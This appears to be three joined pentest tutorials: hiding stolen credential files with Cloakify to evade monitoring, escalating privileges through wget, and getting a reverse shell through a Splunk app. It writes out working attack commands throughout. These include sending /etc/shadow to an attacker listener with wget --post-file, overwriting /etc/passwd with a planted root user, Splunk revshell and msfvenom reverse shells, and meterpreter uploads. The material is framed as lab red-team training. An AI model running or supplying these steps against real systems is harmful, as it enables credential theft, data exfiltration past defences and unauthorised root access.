Cloakify-Factory: A Data Exfiltration Tool Uses Text-Based Steganography

In our previous post, we had already discussed on “Cloud Storage Uploads for data exfiltration” and today we are going to discussed “Concealed Method for Data Exfiltration” to extract the unauthorized data. Here you will learn how an intruder can exfiltrate data through steganography approach.

Table of Content

·         Overview

·         About Data Exfiltration

·         Cloakify Installation and Usages (for Linux)

·         Method -I

·         Method II

·         Cloakify Installation and Usages (for Windows)

Overview

We will perform red team practice, where we will attempt to collect the important files from the victim's machine by inducing steganonography with the help of concealed methods. When copying information from the destination machine, we will try to transform the data to befool the network monitors so that they can not identify the data packet traveling in the network.

All this could be perfromed by using single tool named “Cloakify Factory”.

Cloakify Factory transforms any filetype (e.g .zip, .exe, .xls,etc.) into a list of harmless-looking string. This lets you hide the file in plain sight and transfer the file without triggering alerts. The fancy terms for this “text-based steganography”, hiding data by making it look like other data. Cloaked files defeat signature-based malware detection tools.

About Data Exfiltration

Data exfiltration occurs when malware and/or a malicious actor carries out an unauthorized data transfer from a computer. It is also commonly called data extrusion or data exportation. Data exfiltration is also considered a form of data theft. During the past couple of decades, a number of data exfiltration efforts severely damaged the consumer confidence, corporate valuation, and intellectual property of businesses and national security of governments across the world.

Methods of Data Exfiltration

Open Methods:

·         HTTP/HTTPS Downloads & Uploads

·         FTP

·         Email

·         Instant Messaging

·         P2P filesharing

Concealed Methods:

·         SSH

·         VPN

·         Protocol Tunneling

·         Cloud Storage Uploads

·         Steganography

·         Timing channel

(From Wikipedia)

Cloakify Installation & Usages (for Linux)

CloakifyFactory - Data Exfiltration & Infiltration In Plain Sight; Convert any filetype into list of everyday strings, using Text-Based Steganography; Evade DLP/MLS Devices, Defeat Data Whitelisting Controls, Social Engineering of Analysts, Evade AV Detection.

Only you need to type following for downloading the cloakify from github in the target machine.

git clone https://github.com/TryCatchHCF/Cloakify.git

cd Cloakify.py

chmod -R 777 noiseTools

Let’s run the python script to lunch cloakifyfactory.py

python cloakifyFactory.py

CloakifyFactory is a menu-driven tool that leverages Cloakify Toolset scripts. When you choose to Cloakify a file, the scripts first Base64-encode the payload, then apply a cipher to generate a list of strings that encodes the Base64 payload. You then transfer the file however you wish to its desired destination. Once exfiltrated, choose Decloakify with the same cipher to decode the payload.

Let's take an example now that we want to copy a text file "pwd.txt" from within the target system containing the login credentials of different machines in the network.

Method -I

It may be dangerous to copy the text file directly, so we will transform the input file data into another file as output. To do so follow below steps:

1.       Run the the python script to launch cloakifyfactory.py

2.       Press 1 to select cloakify a file option

3.       Enter the path of source file that you want to transform as input file.

4.       Enter the path of destination file to where you want to save output.

  

Further you will get a list of ciphers, choose the desire option for encrypting the file. Suppose I want the whole content to get changed into facial emojis.

1.       Press 3 for emoji cipher

2.       Allow to Add noise to cloaked file by pressing Y for yes.

3.       Then press 1 to select prependemoji.py as noise generator.

This will save the output result inside the raj.txt file.

As result you will get the output content something like shown in the below image.

Now if you want to obtain the output result in its original format, then you can go with decloakify option which will revert the transformation into its original existence, but before that you have to give all permissions to removeNoise.py

chmod 777 removeNoise.py

To do so follow below steps:

1.            Run the python script to launch cloakifyfactory.py

2.            Press 2 to select decloakify a file option

3.            Enter the path of file that you want to restore back into its original format.

4.            Enter the path of file to where you want to save output.

Press Y to answer yes because we have added noise to cloaked file and select noise generator.

Method II

Again, we have similar file that we want to cloaked into another format directly without operating cloakifyfactory console.

This time you can use single command to cloak the file by adding specify type of cipher as given below:

python cloakify.py /root/Desktop/pwd.txt ciphers/starTrek

After executing above command, we can observe the output result would be something like this as shown in the below image.

So we have used file.txt file as destination file to save the transformed information inside it without printing the output result on screen. Moreover, further we have used decloak command to revert the transformed file back into its original state.

python cloakify.py /root/Desktop/pwd.txt ciphers/starTrek > /root/Desktop/file.txt

python decloakify.py /root/Desktop/pwd.txt ciphers/starTrek

Cloakify Installation and Usages (For Windows)

As we all know this is an exfiltration tool and data could be exfiltrate from any platform either from Linux or Windows based OS, therefore cloakifyfactory has built the application both platforms. In 1^st phase we have use python-based application for Linux machine and now remotely we are going to deploy cloakify factory inside Windows machine using MSI package of python for our python based application.

Thus, we downloaded the MSI package in our local machine (Kali Linux):

wget https://www.python.org/ftp/python/2.7/python-2.7.msi

Now our purpose is to show how an intruder can remotely exfiltrate the data using cloakifyfactory. So, we had compromised the system first and got the meterpreter session and then uploaded the MSI package inside the victim's machine to install the dependency required for python.

upload python-2.7.msi .

shell

msiexec /i python-2.7.msi /qn

Now download the zip file for cloakifyfactory from github in your local machine.

We also need to download 7-zip exe program for extracting the cloakify-master.zip.

Now extract the 7za920.zip  and you will get 7za.exe file that we have to inject in the victim’s machine.

Now let’s upload 7za.exe and cloakfy-master.zip in the remote system. And further use the 7za.exe program to unzip the cloakify-master.zip.

Therefore, execute following command:

upload /root/Downloads/Cloakify-master.zip .

upload /root/Downloads/7za.exe

shell

7za.exe x cloakify-master.zip

Now we want to transfer the secret.txt file of the compromise machine but directly copying the file might generate the alert therefore we will transform the data as done above.

Now again we try to covert the content of secret.txt file by hiding it behind the cloaked file. And it is very simple as performed earlier with little modification. So now we can run the cloakify.py file with the help of python.

C:\Python27\python.exe cloakify.py C:\Users\raj\Desktop\secret.txt ciphers\pokemonGo > dump.txt

type dump.txt

Thus, we can observe that with help of cloakify we have transformed the filetype cannot be detected easily.

Conclusion: cloakify-factory could be very useful for exfiltrating data internally as we saw it has many cipher script that used to cloaked data file and hence it is very effective tool for performing text-based stegnogrphy.

Linux for Pentester: Wget Privilege Escalation

In this article we are going to describe the entire utility of Wget command and how vital  it is in Linux peneration testing. As Wget is used for downloading the files from server so here we will learn that what else we can do by this command in Privilege Escalation.

Table of content

Introduction to Wget

·        Major Operation performed using Wget

Exploiting Wget

·        Sudo Rights Lab setups for privilege Escalation

·        Exploiting Sudo rights

·        SUID Lab setups for privilege Escalation

·        Exploiting SUID

Introduction to Wget

The Wget command is a command line utility that enables the user to download single or multiple file simultaneously from internet or server by the help of many protocols like HTTP, HTTPS and FTP. This command performs many operations that can be used by any user while downloading any file from internet such as: Downloading multiple files, downloading in background, resuming downloading, renaming any downloaded file, Mirror downloading.

The more functionality of this command can be briefly understood by using it’s help command. Here we are using -h argument for this function. As we can see by the below image which showing list of many arguments that can be use with Wget command while executing it. For viewing as below image, we will simply type the command on our Linux screenshot as showing below:

wget -h

                             

Major Operation performed using Wget

To download a file:  Wget command provide assistance to their user for downloading any file/webpage in both platforms i.e. in front of current processing screen and also in background. Here I’m downloading putty.exe file in this article to show overall working process of Wget command. Type below command to download single file which use simple syntax: Wget (option) URL

wget https://the.earth.li/~sgtatham/putty/latest/w32/putty.exe

To download a file in background: As we know Wget is a non-interactive downloader that allows the user to download the file in background too without creating any hassle with the current process.

Here I’m using -b argument for this task following by whole command as mentioned below.

wget -b https://the.earth.li/~sgtatham/putty/latest/w32/putty.exe

To overwrite documents to file: Here in below image we are showing that how one can move the documents of downloaded file to any other file. We will use -O (uppercase) argument for this function.

Type the below mentioned command for the same, in which I have download putty.exe and obtain the output inside raj.exe.

wget -O raj.exe https://the.earth.li/~sgtatham/putty/latest/w32/putty.exe

After completing half download I’m pausing my file by simply pressing ctrl + c to stop my downloading in mid of session just to explain “how we can retrieve or resume our downloading” if we have any network failure issue power cut or any other reasons that can stop our downloading process.

To resume any downloading process: As I have mentioned above if we have any issue or problems that can tends to failure in our downloading process by any mean then we can resume our uncompleted download by -c arguments. Find the below mentioned command as per screenshot:

wget -c -O raj.exe https://the.earth.li/~sgtatham/putty/latest/w32/putty.exe

To download multiple file simultaneously:  Wget also allows the user to download multiple files simultaneously instead to download it one by one. Suppose we have any folder that contains multiple links and we want to download all the files together so we will use this command following by -i arguments.

Here I’m creating a file by the name of “link” which contains two links and I want to download both links together. Type the below mentioned command for performing the same task:

cat link

wget -i link

To turnoff output: Whenever we want to turnoff output of any downloading process then we can use -q arguments for the same. This argument helps the user to download the file in the background by turning off its standard output i.e. downloading the file with complete silence.

We will use Wget command with -q argument for this as shown below.

wget -q https://the.earth.li/~sgtatham/putty/latest/w32/putty.exe

There so many options inside wget but in this post, we have discussed very of them. Because our vision is to demonstrate privilege escalation by exploiting wget, therefore in next phase you will learn how to exploit wget for escalating root shell.

Exploiting wget

Sudo Rights Lab setups for privilege Escalation

Now we will set up our lab of Wget command with higher privilege i.e. with administrative rights. As we know behavior of many commands get changed after getting higher privileges similarly, we will check for the Wget command that what impact it have after getting sudo rights and how we can use it further for privilege escalation.

Refer to this link for more information about sudo rights

It can be clearly understood by the below image in which I have created a local user (test) who possess all sudo rights as root and can perform all task as admin.

To add sudo right open etc/sudoers file and type following as user Privilege specification.

test        ALL=(root) NOPASSWD: /usr/bin/Wget

Exploiting Sudo rights

Now we will start exploiting Wget service by taking privilege of sudoer’s permission. Suppose we got the sessions of victim’s machine that tend us to have local user access of the targeted system through which we can escalate the root user rights.

Very first we will connect to target machine with ssh, therefore, type following command to get access through local user login.

ssh test@192.168.1.22

Then we look for sudo right of “test” user (if given) and found that user “test” can execute Wget command as “root” (since he has ALL user’s right) without password.

sudo -l

Wget utilized the post-file option to send the content of any file. So, here we will use wget command to transfer the content of the /etc/shadow file.

Syntax: sudo /usr/bin/wget –post-file=

Since post-file will transfer the content of shadow file to the listening IP therefore, we should turn on the listener on the destination machine. Hence open a new terminal and start the netcat listener for receiving the sent data from source machine.

Type the below command:

sudo /user/bin/wget –post-file=/etc/shadow 192.168.1.17

As we had already turn on the netcat listener on port 80 to receive the content inside the “hash” file.

nc -lvp 80 > hash

After this we will acquire the content of shadow file of the victim’s machine inside our hash file and then we will use john the ripper to crack the hash value. 

Syntax: john

john hash

Hmmm!! As we can observe from the given below image that it has crack the password for user raj.

Since we got the credentials for the account of user: raj so now, we can easily switch the user and will login as raj and further we tried to access root shell by switching.

su raj

sudo su

And finally, we got the root access hence in this way we spawn the root shell by exploiting wget command.

SUID Lab setups for privilege Escalation

SUID: Set User ID is a type of permission that allows users to execute a file with the permissions of a specified user. Those files which have suid permissions run with higher privileges.  Assume we are accessing the target system as a non-root user and we found suid bit enabled binaries, then those file/program/command can run with root privileges.

Read more from here: https://www.hackingarticles.in/linux-privilege-escalation-using-suid-binaries/

Now we are going to give SUID permission on wget, so that a local user can take privilege of wget as root user.

Hence type following for enabling SUID bit:

which wget

chmod u+S /usr/bin/wget

ls -al /usr/bin/wget

Exploiting SUID

Now again compromise the target’s system and use find command to identify binaries having SUID permission.

 find / -perm -u=s -type f 2>/dev/null

So here we came to know that SUID bit is enabled for so many binary files, but we are interested in /usr/bin/wget.

As we know, wget has suid permission and taking advantage of this right we will try to escalate the root privilege by injecting a new user inside the /etc/passwd file.

First, we will open our /etc/passwd file following by tail command which will read this file from its end and help us to know that the file ends with the user “test”.

Now we are creating salt value of password for our new user and this will be done by using “openssl” following by the command as mentioned in screenshot below.

openssl passwd -1 -salt ignite pass123

And we will get our hash value something like this: “$1$ignite$3eTbJm980Hz.k1NTdNxe1”; copy it for further use.

On moving ahead for the completion of this task now I have copied the entire content of /etc/passwd file in our local machine and will edit a new record for the user “ignite” then paste the above copied hash password in the record as shown below.

Name this file as passwd and run python HTTP server for transferring this file into victim’s machine.

python -m SimpleHTTPServer

Now we want to inject our modified passwd file inside /etc folder to replace the original passwd file. We will use wget with -O to download the passwd file from our machine (kali Linux) inside /etc directory which will overwrite the existing passwd file.

cd /etc

wget -O passwd http://192.168.1.108:8000/passwd

Now let’s switch to ignite that owns root user’s privileges and access the root shell.

su ignite

password: pass123

id

Hence you can notice from the given below image we have escalated the root privilege by abusing 

SUID permission on wget.

Penetration Testing on Splunk

In this article we are going to exploit SPLUNK using reverse shell. One can find this beneficial in exploiting and do penetration testing of SPLUNK environment of their respective IT infrastructure.

Table of Content

·        Introduction to SPLUNK

·        Deploying SPLUNK on UBUNTU

·        Exploiting SPLUNK using reverse shell

What is SPLUNK?

Splunk Enterprise Security (ES) is a security information and event management (SIEM) solution that provides insight into machine data generated from security technologies such as network, endpoint, access, malware, vulnerability and identity information. It is a premium application that is licensed independently from Splunk core.

Splunk (the product) captures, indexes, and correlates real-time data in a searchable repository from which it can generate graphs, reports, alerts, dashboards, and visualizations.

For more information read from here.

Deploying SPLUNK on UBUNTU

Now we will continue with penetration testing of SPLUNK on LINUX platform (here we are using UBUNTU), the same can be performed on windows platform as well.

Visit https://www.splunk.com and register there for downloading free trial version of SPLUNK. Since we are going to continue with UBUNTU we have downloaded the splunk for linux 64 bit (.tgz file).

Once it gets downloaded on your UBUNTU machine, follow the process below for creating instance of SPLUNK:

Open terminal, go to downloads and extract file using

tar -zxfv  splunk-7.3.0-657388c7a488-Linux-x86_64.tgz

Now follow these commands for installing splunk:

mv splunk /opt

cd /opt

cd splunk

cd bin/

/opt/splunk/bin/splunk start –accept-license

When asked enter the username and password you need to configure for splunk.

Once done you should see the following screen with url of your splunk GUI

Go to http://ubuntu:8000 (url of your splunk GUI) and enter the user id and password you configured earlier:

Exploiting SPLUNK using reverse shell

In first phase we have discussed how we can deploy splunk in our local machine (Ubuntu) and in this phase we will go with splunk penetration testing where we will try to exploit splunk for obtaining reverse shell of the machine.

For exploiting splunk first now download the latest released shell from following link:

https://github.com/TBGSecurity/splunk_shells/archive/1.2.tar.gz

Now login to splunk gui from your kali machine visiting the IP of Ubuntu server: 8000 (192.168.0.37:8000) and login

Navigate to the “App: Search & Reporting” option and click on “Search & Reporting”

Click on the “Install app from file” option.

For installing any app slunk provides upload form to browse any .spl or .tar.gz for uploading. Taking advantages of functionality we will try to upload our splunk shell that we had downloaded previously.

After uploading restart your splunk instance.

Once restarted, go to apps tab again, Find your installed archive (weaponize splunk for red teaming and pen testing)

We scroll down to find our shell file as shown below. Before we can run, it we need to click on the “Permissions” option to change its permissions.

Click on permissions and change to all apps as shown below:

Now to execute the shell. We navigate to the search option in Splunk and type in our command defining that we want a reverse shell of standard type to talk to out attach machines IP on the listening port.

| revshell std 192.168.0.7 1234

Now go to kali linux and open terminal:

Start netcat using following command on any port you wish (here I have used 1234)

nc –lvp 1234

Hmmm!! As you can observe that by executing id command we shows root uid and gid information but for obtaining proper tty shell we need to break jail.

We used Msfvenom to create a python payload.

msfvenom -p cmd/unix/reverse_python lhost=192.168.0.7 lport=4444 R

The payload is uploaded through our existing Netcat session, all that needed to be done was the payload to be pasted into the terminal and executed but do not forget to run netcat listener inside a new terminal.

A new Netcat session is started on the port (4444) that we defined in our payload and we see the execution occur flawlessly. Once this netcat session is started run following command:

python –c ‘import pty;pty.spawn(“/bin/bash”)’

And after executing the command we can see that shell is gained.

Meterpreter session

If you are hoping for meterpreter session then you can use multi handler for obtaining reverse connection of victim’s machine.

msf > use exploit/multi/handler

msf exploit(multi/handler) > set payload python/meterpreter/reverse_tcp

msf exploit(multi/handler) > set lhost 192.168.0.7

msf exploit(multi/handler) > set lport 9999

msf exploit(multi/handler) > exploit-j

Type following to execute reverse shell

| revshell msf 192.168.0.7 9999

Boooom!! We got the meterpreter session.

And in this way saw splunk penetration testing